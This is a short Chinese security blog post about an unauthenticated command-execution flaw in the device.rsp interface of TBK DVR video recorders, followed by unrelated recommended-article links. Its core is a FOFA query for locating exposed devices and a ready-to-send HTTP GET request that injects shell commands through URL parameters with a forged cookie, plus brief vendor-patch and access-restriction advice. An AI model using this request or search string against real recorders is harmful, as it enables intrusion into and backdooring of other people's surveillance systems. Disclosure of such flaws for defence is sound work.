TBKDVR硬盘录像机device.rsp命令执行漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

TBK DVR硬盘录像机 device.rsp 接口处存在命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞绕过cookie认证执行任意系统指令,写入后门文件,获取录像机shell权限。

漏洞再现

fofa:"Location: /login.rsp"
GET /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=uname%20-a;pwd;ls HTTP/1.1

Host: ip

Cookie: uid=1

修复建议

1、请联系厂商进行修复。 2、如非必要,禁止公网访问该系统。 3、设置白名单访问。

相关推荐
会编程的林俊杰14 分钟前
Redis事务机制
数据库·redis·缓存
阿蒙Amon36 分钟前
详解Python标准库之互联网数据处理
网络·数据库·python
₯㎕星空&繁华38 分钟前
Linux—进程状态
linux·运维·服务器·笔记
周倦岚1 小时前
HTTP数据请求
网络·网络协议·http
xyphf_和派孔明2 小时前
关于Web前端安全防御之点击劫持的原理及防御措施
安全·点击劫持
Sandman6z2 小时前
启用“安全登录”组合键(Ctrl+Alt+Delete)解锁
安全
芯盾时代2 小时前
芯盾时代受邀出席安全可信数据要素交易流通利用研讨会
安全·网络安全·数据安全·芯盾时代
77qqqiqi2 小时前
解决忘记修改配置密码而无法连接nacos的问题
java·数据库·docker·微服务
ALLSectorSorft2 小时前
相亲小程序用户注册与登录系统模块搭建
java·大数据·服务器·数据库·python
nuoxin1142 小时前
CY7C68013A-56LTXC -USB2.0控制器芯片-富利威,国产CBM9002A-56ILG可替代
网络·人工智能·单片机·嵌入式硬件·硬件工程